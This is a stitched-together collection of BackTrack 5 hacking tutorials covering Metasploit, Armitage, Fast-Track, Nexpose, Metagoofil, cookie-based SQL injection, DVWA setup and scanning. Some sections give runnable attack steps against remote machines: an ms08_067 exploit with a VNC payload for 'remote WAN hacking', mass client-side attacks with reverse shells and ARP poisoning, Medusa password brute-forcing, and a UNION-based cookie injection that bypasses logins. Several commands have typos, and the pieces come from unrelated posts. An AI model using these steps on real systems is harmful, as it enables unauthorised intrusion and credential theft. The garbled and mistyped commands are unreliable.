There is no need to introduce armitage, if you are related to the world of penetration testing so you have an idea about armitage and if you are new to the world of ethical hacking than click here to learn about Armitage and click here for Metasploit.

Backtrack 5 is on fire now after installation backtrack 5, you need to setup armitage to perform a effective pen testing, if you are using some older version of backtrack and if you are using other Linux distro like ubuntu than click here to learn how to install armitage.
You dont need to install armitage on backtrack5 because it is available on backtrack5, just follow the steps to run armitage on bt5.
Requirement
Backtrack 5 (Click here to learn)
Java
Metasploit
MySQL
All the requirement is available on backtrack5, so you need not to worry about it.

Open your backtrack and click on Application --> backtrack --> Exploitation tools --> Network exploitation tools --> Metasploit framework --> Armitage

On the next windows click on connect to start armitage, if it is your first time than it may take some time to start armitage.

Now you will see the window of armitage, now your armitage is ready to use, if you dont know how to use it than you have to wait of or next article in which we will surely teach you how to use armitage by different variance.

Metasploit the father of all the exploits is nothing but a database and a great tool that contain exploits for different services for different operating system that can be listen on different ports. Metasploit for remote hacking and metasploit for remote exploits, these are the most important question that most of the people are asking about. We have got different request to write about Metasploit and SET remote exploits or remote hacking so in this tutorial we will look around metasploit remote desktop hacking.

Metasploit is based on different modules like, exploits, payload and so on. We can launch an attack against any operating system if and only if we find the suitable exploits against the operating system, however there is a autopwn that can search all the available exploits against a vulnerability but it takes time for remote or metasploit wan hacking.

Requirement

Operating system (backtrack 5 in my case)
Metasploit
Brain

If you are behind a router than you need to forward a port of your IP to connect with remote computer normally port number 445 seems to be open and I am going to use.
Metasploit Remote (WAN) Hacking Tutorial
Open the terminal and type “msfconsole”
Use the best exploit for remote hacking

msf > use exploit/windows/smb/ms08_067_netapi

Than we need to set the payload “reverse_tcp” for meterpreter is the best payload but for remote exploits vnc inject is good.
There is a need of IP of the remote computer (how to get IP of a computer is another topic) let suppose we have a target IP.

msf  exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
msf  exploit(ms08_067_netapi) > set RHOST target IP

Default port number for this attack is “445” but if you want to use some other port than you set.
Type exploit and hit enter if the target is vulnerable than you must have a session on remote computer, but remember you need to forward your port if it is not open.

Nessus is one of the best vulnerability scanner and vulnerability management but if you are open source lover than you can choose OpenVAS (a vulnerability scanner), Nessus and openVAS are not only a player in vulnerability scanning and management there is another tool for vulnerability scanning called Nexpose. Although Nessus and OpenVAS are available on backtrack 5 and can be integrate with metasploit for the best result, but in some cases we need more results so it is possible to use maximum vulnerability scanning tool in the process of penetration testing and ethical hacking.
 
Metasploit Autopwn With Nessus Backtrack 5 Tutorial
Nessus Setup On Backtrack 5
Integrate Nessus With Metasploit- Tutorial

After different tutorial of Nessus and Metasploit in backtrack machine we have decided to share something about nexpose, however I have used Nessus for a year but now decided to test Nexpose because of Rapid7. Nexpose vs Nessus is totally another topic that we will discuss here but in my views Nexpose and nessus approximately provide the same result but it is good to use different tool.
What Is Nexp0se?
Rapid7 Nexpose, which received the highest rating of “Strong Positive” in Gartner’s Marketscope for Vulnerability Assessment 2011, supports the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation.
There are different version of Nexp0se are available like Nexp0se enterprise, Nexpose consultant and others. Nexp0se community is a free edition for home and small business.
Download Free Nexp0se

Download a copy of Nexpose that highly suite your operating system. Nexpose installation manual can also be find on the same link.
How to Install Nexp0se on Linux?

This tutorial is for Linux operating system, in this tutorial I will show you how to install Nexp0se in backtrack 5, however if you are using another Linux distribution like Ubuntu, Gnacktrack, Backbox, Blackbuntu and other you can follow the same tutorial to get Nexp0se on your computer.
Nexpose requires some dependencies on the terminal type.
root@bt:~# wget http://ftp.us.debian.org/debian/pool/main/g/gcc-3.3/libstdc++5_3.3.6-20_i386.deb
root@bt:~# dpkg -i libstdc++5_3.3.6-20_i386.deb

After that locate the directory where you have downloaded Nexpose and on the terminal type.
root@bt:~/Downloads# sh NeXposeSetup-Linux32.bin
On the next tutorial on Nexpose we will show you how to integrate Nexpose on Metasploit or how to use Nexpose in metasploit.

Fast-Track is one of the best and fastest tool that will give an advance feature to make the penetration testing fast and easy, now look what fast-track tag line say “Where its OK to finish in under 3 minutes” So if it is OK to finish under 3 minute than why we waste time. On a previous fast-track tutorial on backtrack 5 we have discussed the command window of fast-track with client side attack, however fast-track has web interface too and it is very to easy to use for both autopwn and client-side attack.

What Is Fast-Track Mass Client-Side Attack ?
The Fast-Track Mass Client-Side attack starts a custom HTTP Server on port 80. A default website is popped up and iframes injected into the html code. Metasploit is then loaded through msfconsole and has multiple exploits waiting on different ports. As soon as someone connects to you, the listeners fire off and attack the client with various Metasploit Client-Side attacks.
Fast-Track Tutorial on Backtrack
So as usual I am using backtrack machine for this tutorial however you can use other Linux distribution and other operating system as well, Fast-Track is already installed on backtrack 5 so there is no need to install and other stuffs, if you are using backtrack 5 than you can get fast-track from Applications → Backtrack → Exploitation tools → Network exploitation tools → Fast-Track → Fastttrack-web
Now on the local host you will fast-track windows like:

From the left window you will see Mass client-side attack click on it, easy to use only you need to know the
Main interface # It is a network ID/ router IP or simply default gateway
Mass attack means to attack on all available host that are alive within the network (default gateway define the network).
You need to select the payload select Meterpreter reverse shell, if you want to attack ARP poison on a specific host or a range of host than enable ettercap and enter the victim IP.

There are many new user of metasploit (beginner of metasploit) ask use to write a basic introductory article about the basic metasploit command and basic usage of metasploit, however we have shared different advance and mid level metasploit tutorial on backtrack 5 you can learn different commands from these tutorials but here is the list of the best and most common commands that are used in metasploit for different purposes. Later on we will share meterpreter commands as well.

Metasploit is the database of all exploits and a software that contain information about different exploits so here is the basic usage of metasploit, I am using backtrack 5 machine for this tutorial however if you are using other Linux distribution or windows OS than it is fine but the requirement is Metasploit.

Msfconsole

Msfconsole is a console or a command windows of metasploit that will give you the full support of internal and external metasploit commands, there was a web interface of metasploit but now we don't have that option.

So on your terminal type msfconsole to start metasploit console.

root@bt:~# msfconsole
Metasploit is also available on GUI (graphical user interface), if you want to run metasploit GUI than on the terminal type.

root@bt:~# msfgui

Help command of metasploit will give you the basic idea about the usage of metasploit, if you are looking for msfconsole help than from the root windows type

root@bt:~# msfconsole -h

For msfconsole usage you need to be on msfconsole window to get the help.

msf > help

Connect command is nothing but the alternate of telnet and ncat in metasploit, use connect command to connect with the remote and local host on metasploit you can define the IP of the host machine.

msf > connect -s www.metasploit.com 443
[*] Connected to www.metasploit.com:443
GET / HTTP/1.0
-s → SSL

Ping command of msfconsole is to check the alive host and so on.

msf > ping 192.168.1.45

Show exploits is a command to check all the available exploits on metasploit

msf > show exploits

Show payloads just like show exploits, show payloads will show you all the available payloads on metasploit.

msf > show payloads

Info command will give you more information about any exploits and payloads.

Msf>info <exploit>
msf>info <payload>

Use command will give metasploit an instruction to use a exploit or payload.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > show options To show available options
msf exploit(ms08_067_netapi) > set rhost 119.67.45.2 → To set remote IP (victim IP)
msf exploit(ms08_067_netapi) > set lhost 192.168.1.45 → To set local IP (attacker IP)
msf exploit(ms08_067_netapi) > set rport 445 → To set port number of remote host
msf exploit(ms08_067_netapi) > set lport 443 → To set port number of local host
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns → Tp set payload

msf exploit(ms08_067_netapi) > unset rhost → To remove rhost
msf exploit(ms08_067_netapi) > unset lhost → To remove local host
msf exploit(ms08_067_netapi) > exploit → To execute exploit
msf exploit(ms08_067_netapi) > back → To go back on the main window
msf exploit(ms08_067_netapi) > sessions -l → To check any active session
msf exploit(ms08_067_netapi) > sessions -i ID → To go on a active session ID must be numeric number

If you are active in the community of Penetration tester/ethical hacker than you have heard about metasploit, because it is the most famous tool and used by the most penetration tester as well as used by the hackers. Metasploit is an open source security (Computer) project that contain the information about vulnerabilities.
If you just put all the available exploit in a single place than the phenomena of metasploit occur.
Metasploit framework is a sub project and is use to execute exploit code against a machine and get the desire task done.

Before discussing how to do all the things, you need to understand some basic terms like, vulnerability, exploit and payload. Vulnerability is a weakness or a hole by which an attacker can compromise a machine. Exploit may be a piece of code is an attack that takes advantage of a vulnerability. A payload is the piece of software that lets you control a computer system after it’s been exploited.

Metasploit project provides metasploit pro, metasploit express and metasploit framework. Metasploit framework is an open source and available for free for cross operating system platform (Windows, Linux).

How To Install Metaspolit

In this tutorial we will discuss how to get and install metasploit framework for both Windows and for Linux (like ubuntu), if you are using backtrack than you can find metasploit over there. 
Install Metasploit on ubuntu:

We need some packages to install metasploit, open terminal and type exactly.
$ sudo apt-get install ruby libruby rdoc
$ sudo apt-get install libyaml-ruby
$ sudo apt-get install libzlib-ruby
$ sudo apt-get install libopenssl-ruby
$ sudo apt-get install libdl-ruby
$ sudo apt-get install libreadline-ruby
$ sudo apt-get install libiconv-ruby
$ sudo apt-get install rubygems
Click here to download metasploit, in this case we have downloaded Linux-full.run file. You need to become a root user to run this installation on the terminal type.
$ sudo su
Now locate the directory where you have downloaded metasploit before and type.
$ ./name_of_file.run

Now just forward it accept the agreement, after installation, to run metasploit on the terminal type.
$ msfconsole
Install Metasploit on Windows:
If you want to install metasploit on windows than you need to download the executable file of metasploit click here to download:  The installer includes the packages
Console2
Ruby 1.9.2
PostgreSQL
Java JDK 6
Subversion
VNCViewer
WinVI32
Nmap 5.6
So you dont need to download any other file, just run the installer and you are done!

Information gathering or foot printing is the vary first step of hacking process and we have discussed so many tutorials for information gathering on backtrack 5 and on other OS like ubuntu and windows. In this article you will learn how to gather information from Metadata of public document from victim websites and the tool is Metagoofil. Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf,doc,xls,ppt,odp,ods) available in the target/victim websites.

It will generate a html page with the results of the metadata extracted, plus a list of potential usernames very useful for preparing a bruteforce attack on open services like ftp, pop3,web applications, vpn, etc. Also it will extract a list of disclosed PATHs in the metadata, with this information you can guess OS, network names, Shared resources, etc.
How to Install Metagoofil on Backtrack 5 r1, Ubuntu and Windows

The installation process of Metagoofil on Debian based operating system like Ubuntu and backtrack 5 r1 is very easy, all you need to have is metagoofil download it from here.
If you are on Ubuntu and on other Linux than you need install the dependencies like

root@bt:~# apt-get install extract
If you are on backtrack 5 just like my case than extract is available on backtrack 5 r1, just download and extract metagoofil. For windows user you must have python to use metagoofil.

The simple command to get extract data from any website by using Metagoofil is.

# python metagoofil.py -d victim.net -l 20 -f all -o output.html -t temp
Here victim.net is the domain name from you want to extract data
-f all means you want to find all type of data from (doc,ppt,pdf,xls,odf,sdw and more)
-l result search
-o output file
-t temporary file that will delete after the process
The output file will give you some amazing information's like:
User name (later we can use for brute force attack)
Path directory path (that will help you to understand the structure)
Creation date
more

SQL injection is most dangerous attack for web application, there are a lot of different websites are vulnerable to SQL injection. There are different variant for SQL injection like a simple SQL injection, blind SQL injection and Cookies based SQL injection. As you know the basic idea about cookies and their importance, cookies are represent some session and normally they count in cross site scripting attack (XSS) but what is cookies based SQL injection. In this article we will discuss cookies or session based SQL injection attack.

Did you say a “Cookie” ?
A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is used for an origin website to send state information to a user’s browser and for the browser to return the state information to the origin site. The state information can be used for authentication, identification of a user session, user’s preferences, shopping cart contents, or anything else that can be accomplished through storing text data.

Cookies are not software. They cannot be programmed, cannot carry viruses, and cannot install malware on the host computer. However, they can be used by spyware to track user’s browsing activities – a major privacy concern that prompted European and US law makers to take action. Cookies could also be stolen by hackers to gain access to a victim’s web account.[1]

Where can I find my cookies?
Here is one way to get your stored cookies using your browser. This method is applied for Mozilla FireFox:

1.From the Tools menu, select Options.
If the menu bar is hidden, press Alt to make it visible.

2.At the top of the window that appears, click Privacy.
3.To modify settings, from the drop-down menu under “History”, select Use custom settings for history. Then enable or disable the settings by checking or unchecking the boxes next to each setting:

◦To allow sites to set cookies on your computer, select Accept cookies from sites. To specify which sites are always or never allowed to use cookies, click Exceptions.
◦To accept third-party cookies, check Accept third-party cookies. In the drop-down menu next to “Keep until:”, select the time period you wish to keep cookies on your computer.
◦To view the cookies stored on your computer, click Show Cookies… . In the window that appears, you can view the cookies on your computer, search for cookies, and remove any or all of the listed cookies.
◦To specify how the browser should clear the private data it stores, check Clear history when Firefox closes. Then, click Settings… . You can specify the items to be cleared when you close Firefox.

4.Click OK until you return to the Firefox window.
To remove all cookies, from the Tools menu, select Clear recent history… . Check the items you want to clear, and then click Clear Now.

Are you talking about a Cookie Poisoning-like attack?
Cookie Poisoning attacks involve the modification of the contents of a cookie (personal information stored in a Web user’s computer) in order to bypass security mechanisms. Using cookie poisoning attacks, attackers can gain unauthorized information about another user and steal their identity.

Cookie poisoning is a known technique mainly for achieving impersonation and breach of privacy through manipulation of session cookies, which maintain the identity of the client. By forging these cookies, an attacker can impersonate a valid client, and thus gain information and perform actions on behalf of the victim. The ability to forge such session cookies (or more generally, session tokens) stems from the fact that the tokens are not generated in a secure way.[4]

To sum up, cookie-based SQL Injection is far to be a kind of Cookie Poisoning.

Cookie variables as a vector of SQL Injections:
SQL injection overview
A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

All data sent by the browser to a Web application, if used in a SQL query, can be manipulated in order to inject SQL code: GET and POST parameters, cookies and other HTTP headers. Some of these values ​​can be found in the environment variables. The GET and POST parameters are typically entered into HTML forms, they can contain hidden fields, i.e. information that is in form but not shown. GET parameters are contained in the URL and POST parameters are passed as HTTP content. Nowadays, and with the growth of Web 2.0 technologies, the GET and POST requests can also be generated by JavaScript.

Injecting malicious code in cookie:
Unlike other parameters, cookies are not supposed to be handled by users. Outside of session cookies which are (usually) random, cookies may contain data in clear or encoded in hexadecimal, base64, hashes (MD5, SHA1), serialized information. If we can determine the encoding used, we will attempt to inject SQL commands.

function is_user($user) {

global $prefix, $db, $user_prefix;

if(!is_array($user)) {

        $user = base64_decode($user);

        $user = explode(“:”, $user);

$uid = “$user[0]“;

$pwd = “$user[2]“;

} else {

$uid = “$user[0]“;

$pwd = “$user[2]“;

}

if ($uid != “” AND $pwd != “”) {

    $sql = “SELECT user_password FROM “.$user_prefix.”_users WHERE user_id=’$uid’”;

$result = $db->sql_query($sql);

$row = $db->sql_fetchrow($result);

$pass = $row[user_password];

if($pass == $pwd && $pass != “”) {

return 1;

}

}

return 0;

}
The cookie contains base64 encoded form identifier, a field that is unknown and a password. If we use as a cookie 12345 ‘UNION SELECT’ mypass ‘:: mypass base64 encoded, the SQL query becomes:

SELECT user_password FROM nk_users WHERE user_id=’12345′ UNION SELECT ‘mypass’
This query returns the password mypass, the same password as we have to provide. So we are connected.

How to inject the code in Cookies?
There are many HTTP interceptors and HTTP editors that can intercept the HTTP request before it is sent to the server. Then the tester can introduce his malicious SQL statement in the cookie field.

It’s like a get/post based SQL Injection, except that certain characters can’t be used. For
example, ‘;‘ and ‘,‘ are typically treated as delimiters, so they end
the injection if they aren’t URL-encoded.

Conclusion
Cookie variables sometimes are not properly sanitized before being used in SQL query. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code. For the web application audits, cookie variables should be added to the list of parameters to be checked.

Author
Yasser ABOUKIR has wrote this informative article he studying computer science engineering and specialized on IT Security at ENSIAS. He blogs at http://www.yaboukir.com

Backtrack is the best Linux distribution for penetration testing and ethical hacking purposes, backtrack 5 R1 is the latest one and as discussed tutorials about backtrack 5 are also applicable on backtrack 5 R1. So in this tutorial I will tell you how to install damn vulnerable web application on backtrack machine, however you can install damn vulnerable web application on windows, MAC and some other Linux distribution like Ubuntu process is approximately same.

What Is Damn Vulnerable Web Application?
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
It is a best platform to practice web application hacking and security.
Damn Vulnerable Web Application Tutorial Backtrack 5 R1
Generally we need xampp server to setup damn vulnerable web application but xampp server is nothing but a collection of apache, sql, perl, PHP, openssl and other server side software's but backtrack 5 has all of these software's installed. It means there is no need to install xampp on backtrack machine. All you need to do is to get damn vulnerable web app and put it on the root directory of backtrack. We have a wonderful bash that automate all the process.

#/bin/bash
echo -e "\n#######################################"
echo -e "# Damn Vulnerable Web App Installer Script #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Changing directory to /var/www..."
cd /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Removing default index.html..."
rm index.html > /dev/null
echo -e "Done!\n"

echo -n "[*] Changing to Temp Directory..."
cd /tmp
echo -e "Done!\n"

echo "[*] Downloading DVWA..."
wget http://voxel.dl.sourceforge.net/project/dvwa/DVWA-1.0.7.zip
echo -e "Done!\n"

echo -n "[*] Unzipping DVWA..."
unzip DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Deleting the zip file..."
rm DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Copying dvwa to root of Web Directory..."
cp -R dvwa/* /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Clearing Temp Directory..."
rm -R dvwa > /dev/null
echo -e "Done!\n"

echo -n "[*] Enabling Remote include in php.ini..."
cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini1
sed -e 's/allow_url_include = Off/allow_url_include = On/' /etc/php5/apache2/php.ini1 > /etc/php5/apache2/php.ini
rm /etc/php5/apache2/php.ini1
echo -e "Done!\n"

cho -n "[*] Enabling write permissions to /var/www/hackable/upload..."
chmod 777 /var/www/hackable/uploads/
echo -e "Done!\n"

echo -n "[*] Starting Web Service..."
service apache2 start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Starting MySQL..."
service mysql start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Updating Config File..."
cp /var/www/config/config.inc.php /var/www/config/config.inc.php1
sed -e 's/'\'\''/'\''toor'\''/' /var/www/config/config.inc.php1 > /var/www/config/config.inc.php
rm /var/www/config/config.inc.php1
echo -e "Done!\n"

echo -n "[*] Updating Database..."
wget --post-data "create_db=Create / Reset Database" http://127.0.0.1/setup.php &> /dev/null
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/gordonb.jpg" where user = "gordonb";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/smithy.jpg" where user = "smithy";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/admin.jpg" where user = "admin";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/pablo.jpg" where user = "pablo";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/1337.jpg" where user = "1337";'
echo -e "Done!\n"

echo -e -n "[*] Starting Firefox to DVWA\nUserName: admin\nPassword: password"
firefox http://127.0.0.1/login.php &> /dev/null &
echo -e "\nDone!\n"
echo -e "[\033[1;32m*\033[1;37m] DVWA Install Finished!\n"

Copy this code open text editor paste and than save it to whatever.sh and than open yout terminal locate the directory where you have saved this file before than use.

sh whatever.sh

You are done your damn vulnerable web application are install successfully, all the credit goes to the unl33t for the wonderful script.

When it comes to learning how to perform penetration testing with Backtrack 5, you probably know how tough it looks. Hopefully, with this Backtrack 5 Tutorial, we’re going to change that for you. What if you don’t even know what penetration testing is? Well, before we get started, we’re going to tell you. In a nutshell, penetration testing is a way for an individual (or company) to test the security of a network. It sounds a lot like hacking, doesn’t it? Don’t worry! It’s perfectly legal as long as you are using it with good intentions such as exploiting your own network and using the tool to make your network more secure.

Believe us when we say this, there is a big demand for this. After all, if you can get into a company’s network then that means that someone else probably can to. You’ll also hear of penetration testing referred to as ethical hacking or white hat hacking. Either way, it’s all the same. In the Backtrack 5 Tutorial below, we’re going to walk you through the 4 basic steps of penetration testing and teach you what you need to know in order to perform it yourself. Are you ready to get started? Great! Scroll down.

Step 1 – Surveillance

Before we get going with the actual penetration testing, we want to install a free program called “HTTrack” via the Backtrack 5 console. To do this, open Backtrack 5 and enter “sudo apt=get install httrack” and get ready for the next step. Once that’s done, go ahead and type in “httrack” into the console to pull it up. Now, in case you’re wondering, this program will allow us to index all of the pages on a given site before we start the actual penetration testing process. This means that you won’t have to be digging around through some site live and wasting precious time. You also don’t assume the risk of getting kicked off of the server before you get what you need. If that were to happen, you’d need to install this tool anyways so it’s best to play it safe and use it from the beginning.

Next, you will give your path a name (you can leave it blank if you want) and you will enter a website to copy. Once you do that and hit enter, you’ll be given a list of options. To copy the entire website, you’ll simply hit “1” on your keyboard. Give it a few minutes and you’ll have duplicates of the entire site’s contents downloaded.

There are also tools available for download that will let you repeat this process but for sub-domains and emails. We aren’t going to cover that here in this lesson but that’s because it is more of a convenience and isn’t completely necessary. With that being said, it’s about time we move on to Step 2!

Step 2 – Scan The Site

Step 2 forgetting hacking practice is also our favorite step. It’s the actual scanning process and quite frankly, it’s the least complicated step (or one of them). So, the first way to scan the site in question is with a Ping Sweep. To do this, you’ll want to enter the following code into the terminal and wait for the results.

The code: fping –a –g  123.12.12.1 321.32.21.1>hosts.txt

Now, in that code, you’ll notice something strange. There are random numbers in there. Okay, those are sample IP addresses. They aren’t real IP addresses to real sites so you’ll want to replace those with the IP address of a real site (the site you are performing penetration testing on). Essentially, what the Ping Sweet does is it sweeps and scans all the IP addresses from IP address A to IP address B. Make sense?

Once you have these results, we recommend running a vulnerability scan. To do this, enter this code:

“root@bt:~# apt-get install nessus”

Once you have this installed, you can run it by doing the following: Click Applications, Backtrack, Vulnerability Assessment, Vulnerability Scanner, Nessus, and finally, Nessus Start. Then, you wait.

Before you move on to Step 3, we have an additional recommendation that isn’t necessary but it will help. You can easily catalog both email addresses and sub-domains that are associated with the website in question as well with a simple, easy to use Python script called “The Harvester.” To get this on your Backtrack 5 system, you will simply need to type in the following code into your console to get going:

root@bt:~# cd /pentest/enumeration/theharvester

root@bt:~# ./the Harvester.py –d (your site here) -1 10 –b google.com

Now, you see where we entered Google’s web url? You can literally use any search engine that you want there whether it’s Yahoo, Bing, or MSN. Basically what this function does is searches a public resource (a search engine) for emails and sub-domains associated with the address you enter in the code above. Again, this isn’t necessary but it will give you additional information on the site and additional resources that will come in handy when it comes time to start the exploitation process. Now, ready to move on?

Step 3 – Exploit The Site In Question

Now we’re at the stage in the game where we’re going to attempt to exploit the site which is probably what most of you have been waiting for. In other words, it’s crunch time! So, the first thing that you need to do is ensure that you have Medusa installed. Backtrack 5 comes with Medusa pre-installed but just in case it isn’t, here is what you can do. Open your console and type “apt-get update.” Once you’ve done that then you’ll also want to type in “apt-get install medusa.” That should take care of it for you.

Now, before we move on, keep one thing in mind. Some networks will lock you out if you have too many guesses as to what the password is. In order to better your chances and hopefully avoid this, type in the following: /pentest/passwords/wordlists. This is basically a word list that you can use when you run the Medusa program to guess passwords. To get started, enter the code listed below to exploit the server.

“medusa –h target ip –u username –P path to password dictionary –M service to attack”

To make better sense of what you’re reading above, we’re going to explain it and break it down for you. The –h is used to target the IP of the site or its host (many people use Shared IP addresses now).

The –u is for usernames that will be used in attempts to log in. The –P is going to specify an entire list of possible passwords and the –M is going to be used to target a specific service that will be attacked. While this may sound pretty complicated to those of you who have never used Backtrack 5 and are coming to this tutorial with no experience whatsoever, it really isn’t that complicated. It will take a little practice but after a few attempts (hopefully you’re using your own website), you’ll get it down.

Now, once you’ve messed with this some and have at least got familiar with it, move on to Step 4.

Step 4 – Compile Results

Now that you’ve went through the first 3 basic steps from Surveillance to Exploiting the Site, you’re ready to start compiling basic information and results. Were you able to access the server or website in question? Were you locked out because of too many password attempts? Were you able to get around that? These are all questions that you should ask yourself when using Backtrack 5. As mentioned above, this will take a little practice and some getting used to but it’s not a hard piece of software to master.

Best of all, it’s a very valuable piece of software that could potentially save you or your business a lot of money later on down the road. If you can access your own website or server with Backtrack 5 then that means you’re at high risk of being hacked. If you store credit card numbers or secretive information on your site, you definitely don’t want this to happen. While this is only a basic Backtrack 5 tutorial that just outlines the bare essentials of using the software, there is still a lot to learn. Whether you decide to seek outquality backtrack 5 lesson or learn yourself, you’ll find it to be a very rewarding, challenging, and technical experience. On top of that, you’ll also learn logical security practices that will enable you to keep your sites and networks safe from hackers. Now, what are you waiting for? It’s time to start mastering Backtrack 5 today!

Bonus Step

We know that we said we’d let you go but we wanted to give you a bonus step that you can use in order to ensure that you have the best Backtrack 5 experience possible. Not manypaid Backtrack 5 tutorials  are going to give you this information because it’s not something that many people think is that serious but we definitely do. What is it? Well, we recommend regularly updating Backtrack 5. Sometimes, you may find that you literally have to update your software multiple times a week but it’s well worth it. It’s also very easy. All you need to do is type in the following command: apt-get. From there, you’ll always have the latest updates to keep you in the know so you can always learn new wireless hacking and security info. Yep, that’s it! If that doesn’t work then you can always try a more in depth approach by typing the lengthy command below.

root@bt:~# apt-get update && apt-get upgrade && apt-get dist-upgrade

This will ensure that you have all the necessary updates and you’re ready to go the next time you use the software. Many people overlook this step but just like we said above, we think it’s a pretty serious step to take. The updates are absolutely free and there’s literally no good excuse not to take advantage of them. They could come in handy later on down the road and you never know what new updates that will be coming out for Backtrack 5. Since the updates are based on Ubuntu updates, you’ll find that they do come out pretty often. As mentioned above, you may want to do this multiple times a week but for the most part, these updates are quick.

So, with that being said, put in that command before each session of Backtrack 5. This may not get you the updates as soon as they come out but it will ensure that you’re up to date before you use the software. Sound simple enough? That’s because it most definitely is! Now, all that’s left to do is polish your skills, keep your software updated, and go get to work!

Scanning

The scanning process can be divided into three steps:

Determining if a system is active.
Port scanning the system.
Scanning the system for vulnerabilities.

Step 1 is the process of determining whether a target system is turned on and capable of communicating or interacting with our machine. This step is the least reliable and we should always continue with steps 2 and 3 regardless of the outcome of this test. Regardless, it is still important to conduct this step and make note of any machines that respond as alive.
Ports provide a way or location for software and networks to communicate with hardware like a computer. A port is a data connection that allows a computer to exchange information with other computers, software, or devices.

Common Ports and their Service

Port      Number Service
20        FTP data transfer
21        FTP control
22        SSH
23        Telnet
25        SMTP (e-mail)
53        DNS
80        HTTP
443      HTTPS

Pings and Ping Sweeps

A ping is a special type of network packet called an ICMP packet. Pings work by sending specific types of network traffic, called ICMP Echo Request packets, to a specific interface on a computer or network device. If the device (and the attached network card) that received the ping packet is turned on and not restricted from responding, the receiving machine will respond back to the originating machine with an Echo Reply packet. Aside from telling us that a host is alive and accepting traffic, pings provide other valuable information including the total time it took for the packet to travel to the target and return.
Pings also report traffic loss that can be used to gauge the reliability of a network
connection.

Ping google.com with the count argument -c 4 to ping 4 times.

The simplest way to run a ping sweep is with a tool called FPing. FPing is built into Backtrack and is run from the terminal. The easiest way to run FPing is to open terminal window and type the following:

fping –a –g 172.16.45.1 172.16.45.254>hosts.txt

The “–a” argument is used to show only the live hosts in the output. This makes our final report much cleaner and easier to read. The “–g” is used to specify the range of IP addresses we want to sweep. You need to enter both the beginning and the ending IP addresses. In this example, we scanned all the IPs from 172.16.45.1 to 172.16.45.254. The “>” character is used to pipe the output to a file, and the hosts.txt is used to specify the name of the file our results will be saved to.

Port Scanning

There are a total of 65,536 (0–65,535) ports on every computer. Ports can be
either TCP or UDP depending on the service using the port. We scan computers to see what ports are in use or “open”. This gives us a better picture of the purpose of the machine, which gives us a better idea about how to attack the box.

TCP 3-Way Handshake

Before we go on, we first have to know how computers on a network communicate with each other. When two computers want to communicate, they go through a processes known as the 3-way handshake. The first computer A will send a synchronize packet to the other computer B. Then, if computer B is listening (has its port open), it will respond back to A with a synchronize-acknowledgement packet. Finally, computer A will send an acknowledgement packet to computer B, and the two computers will communicate as usual.

Using Nmap

Nmap was written by Gordon Lyon and is available for free from www.insecure.org and is built into today’s Backtrack Linux 5.

Recommended Reading: Nmap Network Scanning

It is the official guide to using the nmap scanner. What more can I say? This book will cover nmap much more in depth than this site.

When we conduct a port scan, Nmap will create a packet and send it to each designated port on the computer just like the 3-way handshake. The goal is to determine what kind of a response we get from the target ports.

To use Nmap, open up the terminal and type:

nmap -p- 192.168.56.101

Here I scan a Windows XP machine on my network.

The “-p-” tells nmap to scan all ports on a target machine. The 10.0.2.15 is the local ip of the target machine.

Vulnerability Scanning

To scan systems for vulnerabilities, we will use a vulnerability scanner. There are several good scanners available, but we will be focusing on Nessus. To install Nessus type:

root@bt:~# apt-get install nessus

Then, to access Nessus via the GUI go to:
Applications -> Backtrack -> Vulnerability Assessment -> Vulnerability Scanner -> Nessus -> Nessus Start.

Metasploit Tutorial: Introduction
Metasploit Terms
MSFconsole
MSFcli
Armitage
MSFpayload
MSFencode
Metasploit is a valuable tool in pen testing a network. However, it can be very confusing for a beginner. These metaspolit tutorials will help you get up and running with metasploit. Most of our hacking will be targeted to windows machines. As a reminder and site disclaimer: I am not responsible for your actions! This is for education only!

Recommended Reading: Metasploit: The Penetration Tester’s Guide

A Book that will show you most of the metasploit framework. However, it leaves you to discover the true power of metasploit for yourself. Overall, highly recommended Air Sealed Tent.

Metasploit Terms

Exploit – to take advantage of a security flaw within a system, network, or application.
Payload – is code that our victim computer to execute by the metasploit framework.
Module – a small piece of code that can be added to the metasploit framework to execute an attack.
Shellcode – a small piece of code used as a payload.

MSFconsole

Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch attacks, creating listeners, and much, much more. We will be using Msfconsole throughout these tutorials, but mastering it will allow you to keep up with metaspolits rapidly changing framework. Metasploit comes installed by default on backtrack 5. To access msfconsole, open your console and type:

root@bt: ~# cd /opt/framework3/msf3/
root@bt: ~#/opt/framework3/msf3# msfconsole

After sometime, the msfconsole will boot.

To view the help files, simply type help followed by the command you want to know more about. In our case, we want to learn about the connect command. The connect command allows us to communicate with a host.

msf > help connect

MSFcli

